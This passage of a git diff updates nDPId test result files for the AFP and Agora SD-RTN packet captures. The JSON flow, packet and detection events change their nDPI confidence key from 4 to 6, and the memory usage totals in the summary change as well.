00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"afp.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1643275951277,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1643275951277,"pkt":"YPgdrn1EABxCVgfWCABFAAA038RAAEAGourAqBuLwKgbOQIk\/dtTX1GKfp5FbYAQVeK4OwAAAQEICgBCwzzU7Vf4"} 
00531{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"afp.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1643275951277,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":116,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":116,"pkt_l4_len":82,"thread_ts_msec":1643275951277,"pkt":"YPgdrn1EABxCVgfWCABFAABm38VAAEAGorfAqBuLwKgbOQIk\/dtTX1GKfp5FbYAYVeK4bQAAAQEICgBCwzzU7Vf4AQIixgAAAAAAAAAiAAAAAA4cx5MnnCmFIy+AAAAAAAAACVyxcAAAAAALpMeAAAAAEAA="} -00681{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":16,"source":"afp.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":16,"flow_first_seen":1643275951277,"flow_last_seen":1643275952364,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":162,"flow_avg_l4_payload_len":10,"midstream":1,"thread_ts_msec":1643275952364,"l3_proto":"ip4","src_ip":"192.168.27.57","dst_ip":"192.168.27.139","src_port":64987,"dst_port":548,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"AFP","breed":"Acceptable","category":"DataTransfer"}} +00681{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":16,"source":"afp.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":16,"flow_first_seen":1643275951277,"flow_last_seen":1643275952364,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":162,"flow_avg_l4_payload_len":10,"midstream":1,"thread_ts_msec":1643275952364,"l3_proto":"ip4","src_ip":"192.168.27.57","dst_ip":"192.168.27.139","src_port":64987,"dst_port":548,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"AFP","breed":"Acceptable","category":"DataTransfer"}} 
00550{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":16,"source":"afp.pcap","alias":"nDPId-test","packets-captured":16,"packets-processed":16,"total-skipped-flows":0,"total-l4-payload-len":162,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":1,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":1,"total-idle-flows":1,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":9,"global_ts_msec":1643275952364} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 16/16 @@ -15,9 +15,9 @@ ~~ total active/idle flows...: 1/1 ~~ total timeout flows.......: 0 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~ total memory allocated....: 5869907 bytes -~~ total memory freed........: 5869907 bytes -~~ total allocations/frees...: 118130/118130 +~~ total memory allocated....: 6003541 bytes +~~ total memory freed........: 6003541 bytes +~~ total allocations/frees...: 120892/120892 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~ json string min len.......: 459 chars ~~ json string max len.......: 686 chars diff --git a/test/results/agora-sd-rtn.pcap.out b/test/results/agora-sd-rtn.pcap.out index 24745af9a..a667cfb96 100644 --- a/test/results/agora-sd-rtn.pcap.out +++ b/test/results/agora-sd-rtn.pcap.out 
@@ -2,165 +2,165 @@ 00552{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":1,"source":"agora-sd-rtn.pcap","alias":"nDPId-test","packets-captured":1,"packets-processed":0,"total-skipped-flows":0,"total-l4-payload-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":2,"global_ts_msec":1649093494350} 00590{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"agora-sd-rtn.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1649093494350,"flow_last_seen":1649093494350,"flow_idle_time":200000,"flow_min_l4_payload_len":234,"flow_max_l4_payload_len":234,"flow_tot_l4_payload_len":234,"flow_avg_l4_payload_len":234,"midstream":0,"thread_ts_msec":1649093494350,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"23.248.186.179","src_port":35778,"dst_port":8130,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00753{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"agora-sd-rtn.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1649093494350,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":276,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":276,"pkt_l4_len":242,"thread_ts_msec":1649093494350,"pkt":"eJS0JASgYDjgxTWgCABFoAEG97pAAD8RrNTAqAJkF\/i6s4vCH8IA8rYwAFo4TAAAIQAAAAAABFNOSQAcADIzLTI0OC0xODYtMTc5LmVkZ2UuYWdvcmEuaW9QRE1EAABDUFRPgQBOT05DIAAAAJfnTudXVvVf7BhRNFQtkmabzFsc4YGcbhGqIyaMUEFFQUQEAEFFU0dQVUJTQQAEpZnsPkMzYe4wgqr+jD6KkFsekH5j6BojNRIPCbkPdUaS4xdQKYVOSVvbHOo64z+26LzM8IhE1k5P6pySRtqNMEtFWFMEAFAyNTZDQ1JUKAD\/l8GP5RGYH3BtBMYIuCeZ2RYJDLhokBYSlJZ+36F5SKhHse0aHz5i"} 
-00649{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"agora-sd-rtn.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1649093494350,"flow_last_seen":1649093494350,"flow_idle_time":200000,"flow_min_l4_payload_len":234,"flow_max_l4_payload_len":234,"flow_tot_l4_payload_len":234,"flow_avg_l4_payload_len":234,"midstream":0,"thread_ts_msec":1649093494350,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"23.248.186.179","src_port":35778,"dst_port":8130,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"SD-RTN","breed":"Acceptable","category":"Media"}} +00649{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"agora-sd-rtn.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1649093494350,"flow_last_seen":1649093494350,"flow_idle_time":200000,"flow_min_l4_payload_len":234,"flow_max_l4_payload_len":234,"flow_tot_l4_payload_len":234,"flow_avg_l4_payload_len":234,"midstream":0,"thread_ts_msec":1649093494350,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"23.248.186.179","src_port":35778,"dst_port":8130,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"SD-RTN","breed":"Acceptable","category":"Media"}} 
00753{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"agora-sd-rtn.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1649093494350,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":276,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":276,"pkt_l4_len":242,"thread_ts_msec":1649093494350,"pkt":"eJS0JASgYDjgxTWgCABFoAEG97tAAD8RrNPAqAJkF\/i6s4vCH8IA8rYwAFo4TAAAIQAAAAAABFNOSQAcADIzLTI0OC0xODYtMTc5LmVkZ2UuYWdvcmEuaW9QRE1EAABDUFRPgQBOT05DIAAAAJfnTudXVvVf7BhRNFQtkmabzFsc4YGcbhGqIyaMUEFFQUQEAEFFU0dQVUJTQQAEpZnsPkMzYe4wgqr+jD6KkFsekH5j6BojNRIPCbkPdUaS4xdQKYVOSVvbHOo64z+26LzM8IhE1k5P6pySRtqNMEtFWFMEAFAyNTZDQ1JUKAD\/l8GP5RGYH3BtBMYIuCeZ2RYJDLhokBYSlJZ+36F5SKhHse0aHz5i"} 00753{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"agora-sd-rtn.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1649093494350,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":276,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":276,"pkt_l4_len":242,"thread_ts_msec":1649093494350,"pkt":"eJS0JASgYDjgxTWgCABFoAEG97xAAD8RrNLAqAJkF\/i6s4vCH8IA8rYwAFo4TAAAIQAAAAAABFNOSQAcADIzLTI0OC0xODYtMTc5LmVkZ2UuYWdvcmEuaW9QRE1EAABDUFRPgQBOT05DIAAAAJfnTudXVvVf7BhRNFQtkmabzFsc4YGcbhGqIyaMUEFFQUQEAEFFU0dQVUJTQQAEpZnsPkMzYe4wgqr+jD6KkFsekH5j6BojNRIPCbkPdUaS4xdQKYVOSVvbHOo64z+26LzM8IhE1k5P6pySRtqNMEtFWFMEAFAyNTZDQ1JUKAD\/l8GP5RGYH3BtBMYIuCeZ2RYJDLhokBYSlJZ+36F5SKhHse0aHz5i"} 
00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":16,"source":"agora-sd-rtn.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1649093494644,"flow_last_seen":1649093494644,"flow_idle_time":200000,"flow_min_l4_payload_len":234,"flow_max_l4_payload_len":234,"flow_tot_l4_payload_len":234,"flow_avg_l4_payload_len":234,"midstream":0,"thread_ts_msec":1649093494644,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"104.166.161.75","src_port":35778,"dst_port":8130,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00756{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":16,"source":"agora-sd-rtn.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1649093494644,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":276,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":276,"pkt_l4_len":242,"thread_ts_msec":1649093494644,"pkt":"eJS0JASgYDjgxTWgCABFoAEGH0RAAD8RTgXAqAJkaKahS4vCH8IA8mZgACuSLAAAIQAAAAAABFNOSQAcADEwNC0xNjYtMTYxLTc1LmVkZ2UuYWdvcmEuaW9QRE1EAABDUFRPgQBOT05DIAAAAJfn07LXEa+z6T\/E9ZYq7dujf0mTIUERohITz4bJ+UFFQUQEAEFFU0dQVUJTQQAEJrOqRoL2C8mDJCug2GRL7DZEeLh\/DiKPC8U53YevJ1St97\/n1O3WVlHR7Qa7szYRugw02wmWmX9ymFGjw8kjJ0tFWFMEAFAyNTZDQ1JUKAD\/l8GP5RGYH3BtBMYIuCeZ2RYJDLhokBYSlJZ+36F5SKhHse0aHz5i"} -00650{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":16,"source":"agora-sd-rtn.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1649093494644,"flow_last_seen":1649093494644,"flow_idle_time":200000,"flow_min_l4_payload_len":234,"flow_max_l4_payload_len":234,"flow_tot_l4_payload_len":234,"flow_avg_l4_payload_len":234,"midstream":0,"thread_ts_msec":1649093494644,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"104.166.161.75","src_port":35778,"dst_port":8130,"l4_proto":"udp","ndpi": {"confidence": 
{"4":"DPI"},"proto":"SD-RTN","breed":"Acceptable","category":"Media"}} +00650{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":16,"source":"agora-sd-rtn.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1649093494644,"flow_last_seen":1649093494644,"flow_idle_time":200000,"flow_min_l4_payload_len":234,"flow_max_l4_payload_len":234,"flow_tot_l4_payload_len":234,"flow_avg_l4_payload_len":234,"midstream":0,"thread_ts_msec":1649093494644,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"104.166.161.75","src_port":35778,"dst_port":8130,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"SD-RTN","breed":"Acceptable","category":"Media"}} 00756{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":17,"source":"agora-sd-rtn.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":2,"flow_last_seen":1649093494645,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":276,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":276,"pkt_l4_len":242,"thread_ts_msec":1649093494645,"pkt":"eJS0JASgYDjgxTWgCABFoAEGH0VAAD8RTgTAqAJkaKahS4vCH8IA8mZgACuSLAAAIQAAAAAABFNOSQAcADEwNC0xNjYtMTYxLTc1LmVkZ2UuYWdvcmEuaW9QRE1EAABDUFRPgQBOT05DIAAAAJfn07LXEa+z6T\/E9ZYq7dujf0mTIUERohITz4bJ+UFFQUQEAEFFU0dQVUJTQQAEJrOqRoL2C8mDJCug2GRL7DZEeLh\/DiKPC8U53YevJ1St97\/n1O3WVlHR7Qa7szYRugw02wmWmX9ymFGjw8kjJ0tFWFMEAFAyNTZDQ1JUKAD\/l8GP5RGYH3BtBMYIuCeZ2RYJDLhokBYSlJZ+36F5SKhHse0aHz5i"} 
00756{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":18,"source":"agora-sd-rtn.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":3,"flow_last_seen":1649093494645,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":276,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":276,"pkt_l4_len":242,"thread_ts_msec":1649093494645,"pkt":"eJS0JASgYDjgxTWgCABFoAEGH0ZAAD8RTgPAqAJkaKahS4vCH8IA8mZgACuSLAAAIQAAAAAABFNOSQAcADEwNC0xNjYtMTYxLTc1LmVkZ2UuYWdvcmEuaW9QRE1EAABDUFRPgQBOT05DIAAAAJfn07LXEa+z6T\/E9ZYq7dujf0mTIUERohITz4bJ+UFFQUQEAEFFU0dQVUJTQQAEJrOqRoL2C8mDJCug2GRL7DZEeLh\/DiKPC8U53YevJ1St97\/n1O3WVlHR7Qa7szYRugw02wmWmX9ymFGjw8kjJ0tFWFMEAFAyNTZDQ1JUKAD\/l8GP5RGYH3BtBMYIuCeZ2RYJDLhokBYSlJZ+36F5SKhHse0aHz5i"} 00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":31,"source":"agora-sd-rtn.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1649093570648,"flow_last_seen":1649093570648,"flow_idle_time":200000,"flow_min_l4_payload_len":234,"flow_max_l4_payload_len":234,"flow_tot_l4_payload_len":234,"flow_avg_l4_payload_len":234,"midstream":0,"thread_ts_msec":1649093570648,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"104.166.161.75","src_port":44131,"dst_port":8130,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
00755{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":31,"source":"agora-sd-rtn.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":1,"flow_last_seen":1649093570648,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":276,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":276,"pkt_l4_len":242,"thread_ts_msec":1649093570648,"pkt":"eJS0JASgYDjgxTWgCABFoAEGJH1AAD8RSMzAqAJkaKahS6xjH8IA8k05ANAoVwAAIQAAAAAABFNOSQAcADEwNC0xNjYtMTYxLTc1LmVkZ2UuYWdvcmEuaW9QRE1EAABDUFRPgQBOT05DIAAAAJgzwLO118m5jESf7QcIh4cU1PAqig4J5CIcJJMIfUFFQUQEAEFFU0dQVUJTQQAE+h\/883r3ClVOi4mwokX05oI0DTLyHRc+Mg2zHhwRMHf\/CFZX2CC3hDi1u5H1Ke3ya+pJgSnx8FOJ6Sw76hdLj0tFWFMEAFAyNTZDQ1JUKAD\/l8GP5RGYH3BtBMYIuCeZ2RYJDLhokBYSlJZ+36F5SKhHse0aHz5i"} -00650{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":31,"source":"agora-sd-rtn.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1649093570648,"flow_last_seen":1649093570648,"flow_idle_time":200000,"flow_min_l4_payload_len":234,"flow_max_l4_payload_len":234,"flow_tot_l4_payload_len":234,"flow_avg_l4_payload_len":234,"midstream":0,"thread_ts_msec":1649093570648,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"104.166.161.75","src_port":44131,"dst_port":8130,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"SD-RTN","breed":"Acceptable","category":"Media"}} +00650{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":31,"source":"agora-sd-rtn.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1649093570648,"flow_last_seen":1649093570648,"flow_idle_time":200000,"flow_min_l4_payload_len":234,"flow_max_l4_payload_len":234,"flow_tot_l4_payload_len":234,"flow_avg_l4_payload_len":234,"midstream":0,"thread_ts_msec":1649093570648,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"104.166.161.75","src_port":44131,"dst_port":8130,"l4_proto":"udp","ndpi": 
{"confidence": {"6":"DPI"},"proto":"SD-RTN","breed":"Acceptable","category":"Media"}} 00755{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":32,"source":"agora-sd-rtn.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":2,"flow_last_seen":1649093570648,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":276,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":276,"pkt_l4_len":242,"thread_ts_msec":1649093570648,"pkt":"eJS0JASgYDjgxTWgCABFoAEGJH5AAD8RSMvAqAJkaKahS6xjH8IA8k05ANAoVwAAIQAAAAAABFNOSQAcADEwNC0xNjYtMTYxLTc1LmVkZ2UuYWdvcmEuaW9QRE1EAABDUFRPgQBOT05DIAAAAJgzwLO118m5jESf7QcIh4cU1PAqig4J5CIcJJMIfUFFQUQEAEFFU0dQVUJTQQAE+h\/883r3ClVOi4mwokX05oI0DTLyHRc+Mg2zHhwRMHf\/CFZX2CC3hDi1u5H1Ke3ya+pJgSnx8FOJ6Sw76hdLj0tFWFMEAFAyNTZDQ1JUKAD\/l8GP5RGYH3BtBMYIuCeZ2RYJDLhokBYSlJZ+36F5SKhHse0aHz5i"} 00755{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":33,"source":"agora-sd-rtn.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":3,"flow_last_seen":1649093570648,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":276,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":276,"pkt_l4_len":242,"thread_ts_msec":1649093570648,"pkt":"eJS0JASgYDjgxTWgCABFoAEGJH9AAD8RSMrAqAJkaKahS6xjH8IA8k05ANAoVwAAIQAAAAAABFNOSQAcADEwNC0xNjYtMTYxLTc1LmVkZ2UuYWdvcmEuaW9QRE1EAABDUFRPgQBOT05DIAAAAJgzwLO118m5jESf7QcIh4cU1PAqig4J5CIcJJMIfUFFQUQEAEFFU0dQVUJTQQAE+h\/883r3ClVOi4mwokX05oI0DTLyHRc+Mg2zHhwRMHf\/CFZX2CC3hDi1u5H1Ke3ya+pJgSnx8FOJ6Sw76hdLj0tFWFMEAFAyNTZDQ1JUKAD\/l8GP5RGYH3BtBMYIuCeZ2RYJDLhokBYSlJZ+36F5SKhHse0aHz5i"} 
00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":46,"source":"agora-sd-rtn.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1649093575787,"flow_last_seen":1649093575787,"flow_idle_time":200000,"flow_min_l4_payload_len":234,"flow_max_l4_payload_len":234,"flow_tot_l4_payload_len":234,"flow_avg_l4_payload_len":234,"midstream":0,"thread_ts_msec":1649093575787,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"104.166.161.19","src_port":44131,"dst_port":8130,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00754{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":46,"source":"agora-sd-rtn.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":1,"flow_last_seen":1649093575787,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":276,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":276,"pkt_l4_len":242,"thread_ts_msec":1649093575787,"pkt":"eJS0JASgYDjgxTWgCABFoAEGb9BAAD8R\/bDAqAJkaKahE6xjH8IA8jq3ADeIqAAAIQAAAAAABFNOSQAcADEwNC0xNjYtMTYxLTE5LmVkZ2UuYWdvcmEuaW9QRE1EAABDUFRPgQBOT05DIAAAAJg4GW0AOb4miWYrD79V3dp03Avt7TH5wg+CXWI7wUFFQUQEAEFFU0dQVUJTQQAEjCK+WoT2o97rehkI3TG55IXFgAabPHd4hAmu5nn67YI3raymU5Wjq30alJlITK96tt+JtMNgvpxcYqAphTU6mUtFWFMEAFAyNTZDQ1JUKAD\/l8GP5RGYH3BtBMYIuCeZ2RYJDLhokBYSlJZ+36F5SKhHse0aHz5i"} -00650{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":46,"source":"agora-sd-rtn.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1649093575787,"flow_last_seen":1649093575787,"flow_idle_time":200000,"flow_min_l4_payload_len":234,"flow_max_l4_payload_len":234,"flow_tot_l4_payload_len":234,"flow_avg_l4_payload_len":234,"midstream":0,"thread_ts_msec":1649093575787,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"104.166.161.19","src_port":44131,"dst_port":8130,"l4_proto":"udp","ndpi": {"confidence": 
{"4":"DPI"},"proto":"SD-RTN","breed":"Acceptable","category":"Media"}} +00650{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":46,"source":"agora-sd-rtn.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1649093575787,"flow_last_seen":1649093575787,"flow_idle_time":200000,"flow_min_l4_payload_len":234,"flow_max_l4_payload_len":234,"flow_tot_l4_payload_len":234,"flow_avg_l4_payload_len":234,"midstream":0,"thread_ts_msec":1649093575787,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"104.166.161.19","src_port":44131,"dst_port":8130,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"SD-RTN","breed":"Acceptable","category":"Media"}} 00755{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":47,"source":"agora-sd-rtn.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":2,"flow_last_seen":1649093575788,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":276,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":276,"pkt_l4_len":242,"thread_ts_msec":1649093575788,"pkt":"eJS0JASgYDjgxTWgCABFoAEGb9FAAD8R\/a\/AqAJkaKahE6xjH8IA8jq3ADeIqAAAIQAAAAAABFNOSQAcADEwNC0xNjYtMTYxLTE5LmVkZ2UuYWdvcmEuaW9QRE1EAABDUFRPgQBOT05DIAAAAJg4GW0AOb4miWYrD79V3dp03Avt7TH5wg+CXWI7wUFFQUQEAEFFU0dQVUJTQQAEjCK+WoT2o97rehkI3TG55IXFgAabPHd4hAmu5nn67YI3raymU5Wjq30alJlITK96tt+JtMNgvpxcYqAphTU6mUtFWFMEAFAyNTZDQ1JUKAD\/l8GP5RGYH3BtBMYIuCeZ2RYJDLhokBYSlJZ+36F5SKhHse0aHz5i"} 
00754{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":48,"source":"agora-sd-rtn.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":3,"flow_last_seen":1649093575788,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":276,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":276,"pkt_l4_len":242,"thread_ts_msec":1649093575788,"pkt":"eJS0JASgYDjgxTWgCABFoAEGb9JAAD8R\/a7AqAJkaKahE6xjH8IA8jq3ADeIqAAAIQAAAAAABFNOSQAcADEwNC0xNjYtMTYxLTE5LmVkZ2UuYWdvcmEuaW9QRE1EAABDUFRPgQBOT05DIAAAAJg4GW0AOb4miWYrD79V3dp03Avt7TH5wg+CXWI7wUFFQUQEAEFFU0dQVUJTQQAEjCK+WoT2o97rehkI3TG55IXFgAabPHd4hAmu5nn67YI3raymU5Wjq30alJlITK96tt+JtMNgvpxcYqAphTU6mUtFWFMEAFAyNTZDQ1JUKAD\/l8GP5RGYH3BtBMYIuCeZ2RYJDLhokBYSlJZ+36F5SKhHse0aHz5i"} 00588{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":61,"source":"agora-sd-rtn.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1649093580792,"flow_last_seen":1649093580792,"flow_idle_time":200000,"flow_min_l4_payload_len":231,"flow_max_l4_payload_len":231,"flow_tot_l4_payload_len":231,"flow_avg_l4_payload_len":231,"midstream":0,"thread_ts_msec":1649093580792,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"128.1.77.66","src_port":44131,"dst_port":8130,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
00753{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":61,"source":"agora-sd-rtn.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":1,"flow_last_seen":1649093580792,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":273,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":273,"pkt_l4_len":239,"thread_ts_msec":1649093580792,"pkt":"eJS0JASgYDjgxTWgCABFoAEDlPVAAD8RFQXAqAJkgAFNQqxjH8IA73jXAJl4HQAAIQAAAAAABFNOSQAZADEyOC0xLTc3LTY2LmVkZ2UuYWdvcmEuaW9QRE1EAABDUFRPgQBOT05DIAAAAJg90n6PIHuGl\/eNNcAGtWbljeiinpOBz\/8f6Thq1EFFQUQEAEFFU0dQVUJTQQAE4fteiUHAa3vScKrQ7k6uVwHTk73GWGrTdxZ5NRX5jjFw27S+1Fe\/4HWIj\/MeCLdpKQNrrdCTyFKV0x0L6QsHDEtFWFMEAFAyNTZDQ1JUKAD\/l8GP5RGYH3BtBMYIuCeZ2RYJDLhokBYSlJZ+36F5SKhHse0aHz5i"} -00647{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":61,"source":"agora-sd-rtn.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1649093580792,"flow_last_seen":1649093580792,"flow_idle_time":200000,"flow_min_l4_payload_len":231,"flow_max_l4_payload_len":231,"flow_tot_l4_payload_len":231,"flow_avg_l4_payload_len":231,"midstream":0,"thread_ts_msec":1649093580792,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"128.1.77.66","src_port":44131,"dst_port":8130,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"SD-RTN","breed":"Acceptable","category":"Media"}} +00647{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":61,"source":"agora-sd-rtn.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1649093580792,"flow_last_seen":1649093580792,"flow_idle_time":200000,"flow_min_l4_payload_len":231,"flow_max_l4_payload_len":231,"flow_tot_l4_payload_len":231,"flow_avg_l4_payload_len":231,"midstream":0,"thread_ts_msec":1649093580792,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"128.1.77.66","src_port":44131,"dst_port":8130,"l4_proto":"udp","ndpi": {"confidence": 
